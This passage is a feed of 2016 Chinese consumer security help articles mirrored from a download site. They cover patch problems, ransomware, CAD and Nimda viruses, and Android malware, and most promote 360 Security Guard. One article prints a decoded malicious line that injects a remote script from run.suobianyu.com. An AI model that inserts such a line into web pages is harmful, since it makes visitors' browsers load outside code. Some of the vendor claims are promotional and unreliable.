卸載補丁的方法</p><p>(1)可以通過控制面板——添加/刪除程序——顯示更新,找到對應的補丁,右鍵卸載。</p><p>(2)使用每個月提供的,補丁卸載工具</p><p>(3)針對某個KB號,自行編輯卸載工具中的config文件</p><p>10. 智能忽略</p><p>說明此補丁不適合當前的系統安裝,可以直接忽略。</p><p>11. office2003補丁安裝失敗,手動安裝提示“系統無法應用此補丁”、“找不到系統所需版本”</p><p>建議您臨時忽略不能修復的漏洞,方法如下:打開360主界面:修復漏洞----查看并修復漏洞---勾選不能修復的漏洞名稱----忽略選中漏洞</p><p>office2003如果是精簡版(ghost系統自帶),缺失部分組件可能導致安裝失敗??梢灾匦掳惭boffice 2003sp3的升級包,或者安裝完整版office,再嘗試運行漏洞修復打補丁。</p><p>12. 關于U盤的補丁KB971029</p><p>答:此補丁只是關閉了U盤的“自動運行”(AutoRun)功能,為了防止用戶在接入usb設備時,不經意中自動運行了usb外接設備中的木馬,病毒等問題。</p><p>而在“我的電腦”界面中,仍會顯示外接設備的圖標,不影響用戶使用usb外接設備。</p><p>13.補丁安裝時間比較長</p><p>(如.NET補丁,但是.NET補丁的安裝不影響它的下次安裝)</p><p>如果已經關掉了漏洞修復的程序,您可以再運行,看是否還有提示有此高危漏洞?;蛘呖梢允謩哟蜷_補丁下載路徑,雙擊運行此補丁包,看是否能順利安裝。</p><p>如果出現報錯,可以將截圖發至論壇。</p><p>14.關于打上.net補丁后mscorsvw.exe狂占CPU的問題</p><p>微軟的MSDN博客曾做過以下解釋:</p><p>mscorsvw.exe在后臺預編譯.NET集合。一旦完成這個工作,它就退出了。典型地,你安裝了.NET系統核心文件后,它將被處理高優先級的集合5到10分鐘,然后直到系統閑置后才處理低優先級的集合。一旦mscorsvw.exe完成以上工作后,將自動關閉,你不會再看到該進程。一個重要的事情是一個低優先級的進程編譯時,你可能看到100%CPU占用,因此它不會嘗試侵占正在運行的其他的進程的資源。一旦該編譯完成,集合將可以通過不同的進程共享頁面,熱啟動將典型地更快速。</p><p>建議安裝.NETFramework的補丁過程比較耗時,請用戶耐心等待。</p><p>如果安裝結束后仍出現電腦比較卡,CPU使用率較高等問題,也請按照提示重啟電腦。另外,可以通過關閉服務可以關閉這個程序。</p><p>桌面右鍵單擊我的電腦/計算機,選擇“管理”——“服務和應用程序”,Microsoft .NET Runtime Optimization Service是.NET運行優化服務進程,關掉這個服務就可以了。</p><p>以上為本期小編給大家提供的漏洞修復相關問題的解決方案,想要知道更多請關注我們。</p> [防護教程]中了js.url.redirector.d / js.url.redirector.e 病毒怎么辦 中了js.url.redirector.d / js.url.redirector.e 病毒解決辦法 http://www.pirinnaturalssoapandspa.com//html/109270_1.html 西西 防護教程 2016/9/29 17:46:41 <p><strong>中了js.url.redirector.d / js.url.redirector.e 病毒怎么辦,中了js.url.redirector.d / js.url.redirector.e 病毒解決辦法。</strong>不少小伙伴反應自己的電腦中了js.url.redirector.d / js.url.redirector.e 病毒,不知道該怎么辦,那么今天小編給大家講講該如何應對。</p><p>360安全衛士西西專區:<a href="http://m.cr173.com/k/360safe" target="_blank">http://m.cr173.com/k/360safe</a></p><p>360安全衛士2016最新版:<a href="http://www.pirinnaturalssoapandspa.com/soft/3188.html" target="_blank">http://www.pirinnaturalssoapandspa.com/soft/3188.html</a></p><p>360手機助手2016版:<a href="http://m.cr173.com/x/41712" target="_blank">http://m.cr173.com/x/41712</a> </p><p><strong style="white-space: normal;">中了js.url.redirector.d / js.url.redirector.e 病毒解決辦法</strong></p><p>一、中毒現象:</p><p>360殺毒實時監控總是提示發現病毒并成功刪除</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14751435672728254.png"/></p><p>此類惡意文件主要存在于如下類似路徑:</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14751435803942655.png"/></p><p>二、中的是什么毒</p><p>js.url.redirector.d/e病毒文件通常是:</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14751436254919477.png"/></p><p>這是一段 javascript 代碼,被加密了,解密后的內容,在末尾有如下代碼</p><p>document.write(&quot;&lt;scriptsrc=&#39;http://run.suobianyu.com/a.js&#39;&gt;&lt;\/script&gt;&quot;);</p><p>其中的網址 http://run.suobianyu.com/a.js 是惡意推廣鏈接</p><p>三、為什么中毒</p><p>由于被訪問的網站帶有這些url后綴,在瀏覽網頁(如視頻 、音樂等網站)時,保存在IE臨時緩存目錄中的文件存在如上惡意代碼,所以被360殺毒監控報出,彈窗提醒。</p><p>四、我該怎么做</p><p>1、 此病毒危害不大,主要目的是推廣。遇到此情況可直接選擇【處理】。建議勾選【自動處理不再提示】。</p><p>2、 此病毒殺掉一次后,下次瀏覽網頁可能會再次出現,產生的打擾比較多,目前360殺毒正在考慮新的解決方案,減少打擾。</p> [病毒漏洞]中了敲詐者病毒怎么辦,中了敲詐者病毒有什么解決辦法 http://www.pirinnaturalssoapandspa.com//html/108687_1.html 西西 病毒漏洞 2016/9/26 16:44:23 <p><strong><span style="line-height: 0px;"></span>中了敲詐者病毒怎么辦,中了敲詐者病毒有什么解決辦法</strong>。發生這種狀況的時候,很多人都很恐慌,一而再再而三的中了這樣的病毒欲哭無淚,因此在這里,小編教大家解決的好辦法。</p><p>360安全衛士西西專區:<a href="http://m.cr173.com/k/360safe" target="_blank">http://m.cr173.com/k/360safe</a></p><p>360安全衛士2016最新版:<a href="http://www.pirinnaturalssoapandspa.com/soft/3188.html" target="_blank">http://www.pirinnaturalssoapandspa.com/soft/3188.html</a></p><p>360手機助手2016版:<a href="http://m.cr173.com/x/41712" target="_blank">http://m.cr173.com/x/41712</a></p><p>今年以來,敲詐者病毒呈現高發態勢,360互聯網安全中心監測到,僅上半年,共截獲電腦端新增敲詐者病毒變種74種,涉及PE樣本40000多個,涉及非PE文件10000多個,全國至少有580000多臺用戶電腦遭到了敲詐者病毒攻擊,且有多達50000多臺電腦最終感染敲詐者病毒,平均每天有約300臺國內電腦感染敲詐者木馬。</p><p>網絡安全機構監測發現,敲詐者病毒正大量利用網頁掛馬、釣魚郵件這兩種方式傳播。由于這種病毒有經濟上的利益,因此它們的更新速度特別快。如果不慎打開帶有病毒網頁或者郵件附件,病毒就會入侵用戶電腦系統,強行加密磁盤中的文檔。</p><p>文檔一打開就醬紫,全是亂碼,哭~~~~~</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748798146851423.png"/></p><p>這是一封信,但是他不是普通的信,他是一封 勒!索!信!</p><p>還有繁體中文、英文等不同版本:</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748799537092710.png"/></p><p style="text-align: center;">圖:攻擊者留下的勒索信(英文版)</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748799698303541.png"/></p><p style="text-align: center;">圖:攻擊者留下的勒索信(繁文版)</p><p>更是獅子大開口,上來就要比特幣,還威脅必須在幾十小時內完成支付,我的天哪~~~~</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748799971680982.png"/></p><p style="text-align: center;">圖:根據敲詐者病毒提示找到付費頁面</p><p>另外,攻擊者還利用部分網站漏洞(包括游戲、新聞等主流網站),把惡意腳本植入網頁中,當有人訪問帶有惡意代碼的網頁時,電腦就會自動下載并執行病毒。如果電腦感染敲詐者病毒,文檔資料會被病毒進行高強度加密。</p><p>由于它們主要采用不對稱加密的方式對系統中的特定文件進行高強度加密,使受害者完全不可能在不支付贖金的情況下自行解密被加密的文件。并且加密具有極高的安全性,如果沒有病毒制作者手里的密鑰,那么根本無法恢復原文件。因為如果要破解加密的話,普通電腦花幾萬年時間也不夠。更惡毒的是,攻擊者只會給受害者留下幾十個小時的思考時間,一旦過期沒有付錢,就會銷毀密鑰,讓用戶的資料徹底煙消云散。</p><h3><strong>目前,360國內首家推出了360反勒索服務</strong></h3><p>針對目前流行的使用非對稱加密的特定木馬家族,提供文檔還原解密服務。</p><p>為您服務的可都是360頂級的反病毒專家,牛不牛吧</p><p>那還不快來開啟服務,拯救您的文檔,就在此刻</p><p>只要下載安裝最新安全衛士11.0Beta版,點擊主界面中 “反勒索服務”</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748800501132764.png"/></p><p>在界面中,開啟反勒索服務。開啟成功后,若您不幸遭遇敲詐者木馬,同時360未及時給您進行風險提示,360將幫您支付最高3比特幣的贖金,并全力幫您恢復被加密文檔</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748800964285291.png"/></p> [防護教程]電腦中了ABCD木馬病毒怎么辦 關于ABCD病毒的那些你不知道的事 http://www.pirinnaturalssoapandspa.com//html/108672_1.html 西西 防護教程 2016/9/26 16:05:38 <p><strong>電腦中了ABCD木馬病毒怎么辦,關于ABCD病毒的那些你不知道的事。</strong>這是很多人在發現自己的電腦中這樣的病毒之后很煩惱的事情,不知道該用什么辦法來解決,在這里小編給大家介紹一下解決的辦法。</p><p>360安全衛士西西專區:<a href="http://m.cr173.com/k/360safe" target="_blank">http://m.cr173.com/k/360safe</a></p><p>360安全衛士2016最新版:<a href="http://www.pirinnaturalssoapandspa.com/soft/3188.html" target="_blank">http://www.pirinnaturalssoapandspa.com/soft/3188.html</a></p><p>360手機助手2016版:<a href="http://m.cr173.com/x/41712" target="_blank">http://m.cr173.com/x/41712</a></p><p>如果您遇到以下所述的任何一個或者類似的場景,那么,您極有可能遇到了acad 病毒。</p><p>“ 360 總是能掃描到病毒,名字為 &nbsp;virus.acad.bursted.b2 (病毒名字不固定,但是有 acad 這個關鍵字),即使我全盤掃描,全部處理,重啟計算機后,還是如此報很多病毒?!?lt;/p><p>“每次打開圖紙,都會在圖紙目錄生成一個 acad.fas &nbsp;文件,好像是這個文件還是隱藏的?!?lt;/p><p>“每次打開 cad 程序,都是響應很慢,會生成一個名字叫 acaddoc.lsp 的文件?!?lt;/p><p>“打開 cad 圖紙時,會自動打開瀏覽器?!?lt;/p><p>以往遇到 acad 病毒的用戶都是這樣反饋的:</p><p>【virus.acad.bursted.b2 CAD病毒360殺不掉 每次重啟都有會出現】</p><p><a href="http://bbs.#/thread-6900151-1-1.html" _src="http://bbs.#/thread-6900151-1-1.html">http://bbs.#/thread-6900151-1-1.html</a></p><p>【每次打開CAD都是無法響應,之后就出現acaddoc這個文件】</p><p><a href="http://bbs.#/thread-14378042-1-1.html" _src="http://bbs.#/thread-14378042-1-1.html">http://bbs.#/thread-14378042-1-1.html</a></p><p>【CAD病毒 每次都打開都顯示 強力殺毒還沒有】</p><p><a href="http://bbs.#/thread-7015019-1-1.html" _src="http://bbs.#/thread-7015019-1-1.html">http://bbs.#/thread-7015019-1-1.html</a></p><p>【cad.fas病毒無法徹底清除】</p><p>http://bbs.#/thread-6894952-1-1.html</p><h3><strong>我遇到的是什么病毒,有何危害?</strong></h3><p>這是 acad 類病毒。危害可能(但不限于)有:</p><p>&nbsp; a) &nbsp;偷取您的 cad 圖紙文件,通過網絡上傳;</p><p>&nbsp; b) &nbsp;惡意自動打開瀏覽器,訪問指定網站,賺取流量;</p><p>&nbsp; c) &nbsp;后臺下載有害的可執行程序</p><h3><strong>為什么查殺很多次,還是查殺不干凈?</strong></h3><p>1、 &nbsp;acad 病毒具有強感染性,很類似宏病毒。</p><p>2、 &nbsp;宏病毒的感染過程是,在您的計算機無病毒的情況下,如果從外界復制了一個帶有感染型的 doc 文檔,那么,在您打開該病毒文檔的同時,它就去感染了您的文檔模板,使您的文檔模板也會帶有此病毒。因 office 軟件存在一個運行機理,在您打開一個文檔時,會自動加載文檔模板,導致,您在打開一個沒有病毒的文檔時,加載了有病毒的文檔模板,之后該無病毒的文檔也會被感染病毒。</p><p>3、 &nbsp;同宏病毒的感染過程,在您的計算機無病毒的情況下,如果從外界復制一個帶有 acad &nbsp;病毒的圖紙目錄,那么在您打開該圖紙文件的同時,病毒會隨著 acad 程序的運行而被加載起來,進而感染到您的 acad 程序目錄。在您打開一個沒有病毒的 acad &nbsp;圖紙時,剛剛被感染到的 acad 程序目錄中的病毒同樣會被加載起來,感染到您當前這個沒有病毒的 acad 圖紙目錄。如此完成了病毒的感染過程。</p><p>4、 &nbsp;但是, acad 病毒比宏病毒更復雜,復雜之處在于 acad 病毒的文件類型比較多,難以查殺干凈。</p><h3><strong>我中了acad病毒,我該怎么做?</strong></h3><p>1、在遇到宏病毒時,因可能存在感染性質,我們通常會使用 360 殺毒的【宏病毒掃描】,此功能會全盤掃描計算機的文檔文件。</p><p>2、宏病毒需要全盤掃描查殺, acad &nbsp;病毒因具有同樣的感染性質,因此也需要全盤掃描查殺, 360 沒有獨立的 acad 掃描功能,需要手動點擊【全盤掃描】,同時開啟 Bitdefender 引擎,掃描全盤的所有文件。</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748780723997449.png" title="t01835028ab8a7e232e.png"/></p><p></p><p>3、我全盤掃描了,也打開了 Bitdefender 引擎,但依舊存在病毒?這種情況,就需要 360 的技術人員來遠程幫助您了。</p><p>因此,如果您要發帖,最好能留下聯系方式,如果不留聯系方式, 360 還是需要聯系您,這樣會耽誤彼此時間,如果不想發帖,也可以私信發給 360 的員工。</p><p>我是 acad 重度使用用戶,我需要對殺毒軟件做針對性的配置優化嗎?</p><h3><strong>可以做針對性的優化,包括的優化措施有:</strong></h3><p>a) 打開 Bitdefender 引擎 ;</p><p>b) 常開文件防護,這樣可以在您計算機的文件發生變動的時候,自動保護您的文件,發現病毒會立刻彈窗告知,這在您經常復制他人的文件到您的計算機的時候非常有用,因為他人的文件可能附帶病毒,文件監控可有效預防;</p><p>c ) 如果殺毒軟件彈出窗口告知您有此類 acad 病毒,您可以通過病毒文件的使用情況來決定是否需要來一次全盤掃描。如果這個文件您發現是您一直使用的圖紙目錄中的,那么這個病毒可能感染您計算機有一陣子了,這時候就要全盤掃描;如果您發現這個文件是您剛剛從他人哪里拷貝來的,這可能是我們及時的殺掉了他人的病毒,防止了感染您的計算機,在這種情況下,您可以無需全盤掃描。</p> [病毒漏洞]中了QQaccelex.exe木馬病毒怎么辦 QQAccelex.exe病毒文件反復生成出現怎么解決 http://www.pirinnaturalssoapandspa.com//html/108665_1.html 西西 病毒漏洞 2016/9/26 16:04:56 <p><strong>中了QQaccelex.exe木馬病毒怎么辦,QQAccelex.exe病毒文件反復生成出現怎么解決</strong>。最近不少用戶發現QQAccelex.exe病毒文件反復生成出現問題,不知道該怎么辦,強行關機等都沒有辦法有效的解決這個問題,小編給大家推薦一下解決這個問題的方法。</p><p>360安全衛士西西專區:<a href="http://m.cr173.com/k/360safe" target="_blank">http://m.cr173.com/k/360safe</a></p><p>360安全衛士2016最新版:<a href="http://www.pirinnaturalssoapandspa.com/soft/3188.html" target="_blank">http://www.pirinnaturalssoapandspa.com/soft/3188.html</a></p><p>360手機助手2016版:<a href="http://m.cr173.com/x/41712" target="_blank">http://m.cr173.com/x/41712</a>&nbsp;&nbsp;</p><p>安全衛士收到多個用戶反饋,C:\\Users\\XXX\\AppData\\Roaming\\Tencent路徑下反復生成一個叫QQAccelex.exe的文件,如截圖所示。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-9/14748768262476392.jpg" title="t01bb5a639096bca1c4.jpg"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-9/14748768682554532.jpg" title="t015daa330a25befddd.jpg"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-9/14748768861371579.jpg" title="t016c99500b37977b1d.jpg"/></p><p><br/></p><p>經分析,該程序為偽裝的QQ程序,實際上是一個流氓軟件。安全衛士可以清除,但系統中還存在驅動木馬導致反復生成。</p><p>建議中招用戶使用安全衛士-系統急救箱,勾選強力模式掃描,重啟電腦再看下。</p><p>后續有什么問題,請關注我們。</p> [病毒漏洞]電腦中了病毒所有文件都多了三個文件是什么原因以及解決辦法 http://www.pirinnaturalssoapandspa.com//html/108459_1.html 西西 病毒漏洞 2016/9/23 17:35:51 <p><strong>電腦中了病毒所有文件都多了三個文件是什么原因以及解決辦法</strong>,最近不少人的電腦中了不知道是什么怎么回事,突然間就多了三個文件,所有的圖片都沒有辦法正常打開,這一直很困擾著人們。在這里小編告訴你,是什么原因讓你的電腦多了三個文件。</p><p>360安全衛士西西專區:<a href="http://m.cr173.com/k/360safe" target="_blank" textvalue="http://m.cr173.com/k/360safe">http://m.cr173.com/k/360safe</a></p><p>360安全衛士2016最新版:<a href="http://www.pirinnaturalssoapandspa.com/soft/3188.html" target="_blank" textvalue="http://www.pirinnaturalssoapandspa.com/soft/3188.html">http://www.pirinnaturalssoapandspa.com/soft/3188.html</a></p><p>360手機助手2016版:<a href="http://m.cr173.com/x/41712" target="_blank" textvalue="http://m.cr173.com/x/41712">http://m.cr173.com/x/41712</a></p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14746252539472624.jpg"/></p><h3><strong>電腦中了病毒所有文件都多了三個文件是什么原因?</strong></h3><p>其實就是尼姆達病毒(Nimda),它是是典型的蠕蟲病毒,病毒由JavaScript腳本語言編寫,病毒通過email、共享網絡資源、IIS服務器、網頁瀏覽傳播,修改本地驅動器上的.htm,.html和.asp文件。此病毒可以使IE和Outlook Express加載產生readme.eml病毒文件。該文件將尼姆達蠕蟲作為附件,不需要拆開或運行這個附件病毒就被執行。</p><h3><strong>尼姆達病毒解決辦法</strong></h3><p>沒有網絡局域網的企業級用戶,沒有網絡版的反病毒(殺毒軟件),清除作操方法: 熱啟動,結束此蠕蟲病毒的進程。 在系統的temp文件目錄下刪除病毒文件。 使用無毒的 riched20.dll(約100k)文件替換染毒的同名的riched20.dll文件(57344字節) 將系統目錄下的load.exe文件(57344字節)徹底刪除以及windows根目錄下的mmc.exe文件;要在各邏輯盤的根目錄下查找Admin.DLL文件,如果有Admin.DLL文件的話,刪除這些病毒文件,并要查找文件名為Readme.eml的文件,也要刪除它。 如果用戶使用的是Windows NT或Windows 2000的操作系統的計算機,那么要打開&quot;控制面板&quot;,之后打開&quot;用戶和密碼&quot;,將Administrator組中guest帳號刪除。</p> [網絡安全]Gugi惡意軟件是什么 安卓用戶注意防范Gugi惡意軟件 http://www.pirinnaturalssoapandspa.com//html/106382_1.html 西西 網絡安全 2016/9/7 10:58:11 <p><strong>Gugi惡意軟件是什么?安卓用戶注意防范Gugi惡意軟件</strong>最近網絡安全人員發現了一款叫Gugi的惡意軟件,可以盜取用戶信息,快來看看Gugi惡意軟件是什么?怎么防護Gugi惡意軟件?</p><p>據美國《華爾街日報》最新報道,網絡安全研究人員發現了一種能繞開安卓6版本智能手機操作系統安全功能的新型惡意軟件,犯罪分子將得以侵入銀行應用并盜取信用卡信息。</p><p>跟蹤網絡威脅活動的卡巴斯基實驗室稱,這種惡意軟件通過在真正的手機銀行應用和谷歌應用商店(Google Play Store)應用上形成覆蓋屏而盜取手機用戶的詳細信息。該惡意軟件攻擊安卓操作系統6版本;該版本于2015年末發布,具有旨在阻止這類攻擊的安全功能。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-9/14732172885221464.jpg"/></p><p>此次發現的惡意軟件是一直攻擊安卓操作系統所有版本的“Gugi”木馬惡意軟件的變種;木馬是偽裝成合法軟件的惡意軟件。</p><p>相關人員稱,公司在今年6月檢測到Gugi惡意軟件的這一變種,距離首次發現這種惡意軟件族已有6個月。這家網絡安全公司在周二的新聞稿和網站博文上宣布發現該新型惡意軟件。</p><p>Gugi惡意軟件通常通過鼓動用戶點擊鏈接的短信息而感染智能手機,主要盜取短消息,因為很多銀行向用戶發送短消息,作為第二種交易認證手段。</p> [病毒漏洞]360安全衛士可以查殺敲詐者病毒嗎 敲詐者病毒破壞的文件如何恢復 http://www.pirinnaturalssoapandspa.com//html/82708_1.html 西西 病毒漏洞 2016/3/21 9:41:03 <p>最近有不少用戶反映說電腦中病毒了,電腦上的文檔、圖片等文件被加密打不開了,如果您也遇到了這種情況的話,那么非常不幸的告訴,您中了敲詐者病毒了!敲詐者病毒是什么?360安全衛士可以查殺敲詐者病毒嗎?敲詐者病毒破壞的文件怎么恢復?下面西西就來告訴大家!</p><p><span style="color: rgb(255, 0, 0);"><strong>360安全衛士西西專區:</strong></span><a href="http://m.cr173.com/k/360safe" target="_blank" textvalue="http://m.cr173.com/k/360safe">http://m.cr173.com/k/360safe</a></p><p><span style="color: rgb(255, 0, 0);"><strong>360手機衛士2016版:</strong></span><a href="http://m.cr173.com/x/10818" target="_blank" textvalue="http://m.cr173.com/x/10818">http://m.cr173.com/x/10818</a></p><p><span style="color: rgb(255, 0, 0);"><strong>360手機助手最新版:</strong></span><a href="http://m.cr173.com/x/41712" target="_blank" textvalue="http://m.cr173.com/x/41712">http://m.cr173.com/x/41712</a></p><h3>敲詐者病毒是什么?</h3><p>西西此前其實為大家帶來過一篇電腦中所有文件都變成MP3格式,其實那就是敲詐者病毒干的!</p><p>敲詐者病毒目前主要有VirLock和CTB-Locker兩種,兩種病毒均是敲詐比特幣的。</p><p>VirLock:自定義加密算法,360是目前唯一可以查殺修復感染文件的安全軟件</p><p>CTB-Locker:使用RSA加密算法,敲詐彈窗里有RSA字樣,RSA加密是目前互聯網最主流的加密算法,目前全球所有安全軟件均無法通過查殺進行破解,都是只能在打開病毒文件前進行防御而已,所以已經不幸中毒的只能指望之前的備份,大家對于此病毒主要還是要做好平時的備份。另外國外一個安全網站可以部分提供破解,大家可以嘗試一下,不過不要抱太大希望。</p><h3>360安全衛士可以查殺嗎?</h3><p>根據在線殺毒平臺VirusTotal掃描,目前國內只有360殺毒和安全衛士能夠查殺攔截最新的敲詐者病毒。</p><p><span style="color: rgb(255, 0, 0);"><strong>360安全衛士2016版:</strong></span><a href="http://www.pirinnaturalssoapandspa.com/soft/3188.html" target="_blank" textvalue="http://www.pirinnaturalssoapandspa.com/soft/3188.html">http://www.pirinnaturalssoapandspa.com/soft/3188.html</a></p><p>敲詐者病毒花招頻出,包括郵件發送帶毒附件,利用網站掛馬,其傳播渠道越來越多。</p><p>暗藏敲詐者病毒的英文郵件,附件帶有payment字樣,解壓縮后出現惡意腳本,雙擊打開就會中招:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14585250173632841.jpg"/></p><p>另外,黑客還利用部分網站漏洞(包括游戲、新聞等主流網站),把惡意腳本植入網頁中,當有人訪問帶有惡意代碼的網頁時,電腦就會自動下載并執行病毒。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14585250315063123.jpg"/></p><p>如果電腦感染敲詐者病毒,文檔、圖片、視頻等重要資料會被病毒進行高強度加密。如果沒有病毒制作者手里的私鑰,那么根本無法恢復原文件。因為如果要破解加密的話,普通電腦花幾萬年時間也不夠。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14585250456063017.jpg"/></p><p>根據VirusTotal(谷歌旗下的在線殺毒掃描平臺)檢測,目前僅有McAfee和360能夠檢測最新的敲詐者病毒,360對該病毒的檢測結果是HEUR/QVM07.1.Malware.Gen,這意味著搭載了QVM引擎的360安全衛士和360殺毒都能夠防御和查殺該敲詐者病毒。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14585250625883116.jpg"/></p> [防護教程]Windows檢測到ip地址沖突怎么辦 IP沖突的完美解決方法【Win7+XP】 http://www.pirinnaturalssoapandspa.com//html/82112_1.html 西西 防護教程 2016/3/13 9:59:57 <p>不知道大家有沒有遇到過,電腦用的好好的,突然彈窗提示“windows檢測到ip地址沖突”,出現IP沖突的話,有的可能不會影響你正常上網,不過有的確會讓你無法正常上網,那么遇到這種IP沖突的情況應該怎么辦?本次西西就來為大家帶來了ip沖突解決辦法,有Win7和XP兩種辦法,快來看看吧!</p><p><span style="color: rgb(255, 0, 0);"><strong>360安全衛士西西專區:</strong></span><a href="http://m.cr173.com/k/360safe" _src="http://m.cr173.com/k/360safe">http://m.cr173.com/k/360safe</a></p><p><span style="color: rgb(255, 0, 0);"><strong>360手機衛士最新版本:</strong></span><a href="http://m.cr173.com/x/41712" _src="http://m.cr173.com/x/41712">http://m.cr173.com/x/41712</a></p><p>如果你的電腦IP沖突的話,會在電腦右下角出現黃色感嘆號,或者出現IP沖突的提示。詳細如下:</p><p><strong>Win7:</strong></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578362642493009.jpg"/></p><p><strong>XP:</strong></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578362715060651.jpg"/></p><p><span style="color: rgb(255, 0, 0);"><strong>360安全衛士2016版:</strong></span><a href="http://www.pirinnaturalssoapandspa.com/soft/3188.html" _src="https://pic.cr173.com/soft/3188.html">http://www.pirinnaturalssoapandspa.com/soft/3188.html</a></p><h3>解決方案:</h3><p>1、最簡單的辦法重新啟動路由器(部分沖突問題可以解決)。</p><p>2、手動修改IP地址(簡單介紹XP系統和WIN7系統):</p><p><span style="font-size: 14px; color: rgb(255, 0, 0);"><strong>【XP系統】</strong></span></p><p>1.右鍵點擊“網上鄰居”-&gt;“屬性”:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364039977583.jpg"/></p><p>2.打開管理網絡連接的窗口,右鍵點擊“本地連接”-&gt;“屬性”。在本地連接屬性中,雙擊“Internet 協議(TCP/IP)”選擇“Internet 協議行IP地址的設置??梢允謩舆M行設置,若路由器開啟DHCP功能,也可以設置為自動獲取IP地址與DNS服務器地址,就可以解決IP地址沖突的問題了。</p><p><span style="color: rgb(112, 48, 160);">(注:大部分路由器采用的是192.168.1的IP地址,可以使用192.168.1.2-192.168.1.254之間的地址。也可以通過開始--運行--輸入CMD命令,輸入ipconfig /all命令即可獲取,查看到當前網絡信息)</span></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364123698484.jpg"/></p><p><span style="color: rgb(255, 0, 0); font-size: 14px;"><strong>【Win7系統】</strong></span></p><p>1.開始按鈕,選擇“控制面板”進入。進入控制面板,選擇網絡和Internet下面的“查看網絡狀態和任務”(注:如果沒有找到網絡和Internet,可能您在控制面板切換查看方式,在左上角查看方式切換為類別即可看到)</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364122429975.jpg"/></p><p>2.在網絡共享中心選擇“更改適配器設置”</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364129988295.jpg"/></p><p>3.在網絡連接頁面右鍵單擊你目前的網絡連接,選擇“屬性”</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364127744886.jpg"/></p><p>4.在網絡屬性頁面選擇“internet協議版本4”,然后點擊“屬性”。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364131760083.jpg"/></p><p><span style="color: rgb(112, 48, 160);">(注:大部分路由器采用的是192.168.1的IP地址,可以使用192.168.1.2-192.168.1.254之間的地址。也可以通過開始--運行--輸入CMD命令,輸入ipconfig /all命令即可獲取,查看到當前網絡信息)</span></p><p><span style="color: rgb(227, 108, 9); font-size: 14px;"><strong>Win7系統自動分配IP方法:</strong></span></p><p>使用快捷鍵:【Win+R】組合,打開運行--輸入CMD--進入【MSDOS】啟動命令提示符!</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364132147764.jpg"/></p><p>命令提示框輸入ipconfig /renew后回車,系統重新獲取新的IP地址成功?。?lt;span style="color: rgb(112, 48, 160);">注:由于小編公司網絡就不進行圖片演示了,一般會出現成功的提示,運行這個命令一般可以解決哦。</span>)</p> [防護教程]電腦中了BNDeskHomepage.exe病毒怎么辦 怎么徹底刪除deskhomepage.exe文件 http://www.pirinnaturalssoapandspa.com//html/81921_1.html 西西 防護教程 2016/3/10 13:46:40 <p>最近有很多用戶朋友反應說電腦中了BNDeskHomepage 179-1.exe文件病毒,只要打開英雄聯盟,游戲主界面就會卡死,然后后臺就會不停的瘋狂安裝程序,那么怎么刪除BNDdeskhomepage-179-1.exe文件呢?中了BNDeskHomepage.exe病毒怎么辦呢?下面西西就為教教大家!</p><p><span style="color: rgb(255, 0, 0);"><strong>360安全衛士西西專區:</strong></span><a href="http://m.cr173.com/k/360safe" _src="http://m.cr173.com/k/360safe">http://m.cr173.com/k/360safe</a></p><p><span style="color: rgb(255, 0, 0);"><strong>360手機安全衛士:</strong></span><a href="http://m.cr173.com/x/41712" _src="http://m.cr173.com/x/41712">http://m.cr173.com/x/41712</a></p><h3>BNDeskHomepage.exe病毒是什么?</h3><p>此問題是由于游戲客戶端出現掛馬情況,木馬利用Flash漏洞感染游戲玩家電腦,自動安裝多款流氓推廣軟件,并頻繁彈出廣告窗口。此次掛馬重災區位于河南,疑似是由于網絡劫持導致了游戲被掛馬。</p><p>各位河南學校校園網的小伙伴要注意了哦,如果你也出現了這樣的情況,一定要注意,千萬不要大意。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14575894866865431.jpg"/></p><h3>檢查病毒方法:</h3><p><span style="color: rgb(255, 0, 0);">BNDeskHomepage 179-1.exe文件位置 &nbsp;../lol/air/</span></p><p><span style="color: rgb(112, 48, 160);">特別說明:此文件為隱藏文件,如果電腦中沒有看到,可能是隱藏起來,顯示隱藏文件在檢查一遍。</span></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14575895644158674.png"/></p><h3>解決辦法:</h3><p>其實解決辦法很簡單,你只需要下載最新的360安全衛士,目前360已經開始解決該病毒了。</p><p><span style="color: rgb(255, 0, 0);"><strong>360安全衛士最新版本:</strong></span><a href="http://www.pirinnaturalssoapandspa.com/soft/3188.html" _src="https://pic.cr173.com/soft/3188.html">http://www.pirinnaturalssoapandspa.com/soft/3188.html</a></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14575898128755217.jpg"/></p><p><strong>如果你安裝最新的360安全衛士還無法解決的話,可以在評論區留言給小編,小編看到了在想辦法為大家解決。</strong></p> [防護教程]電腦中毒了所有文件后綴都變成MP3格式怎么辦 電腦所有文件變成MP3格式解決辦法 http://www.pirinnaturalssoapandspa.com//html/81608_1.html 西西 防護教程 2016/3/7 15:30:00 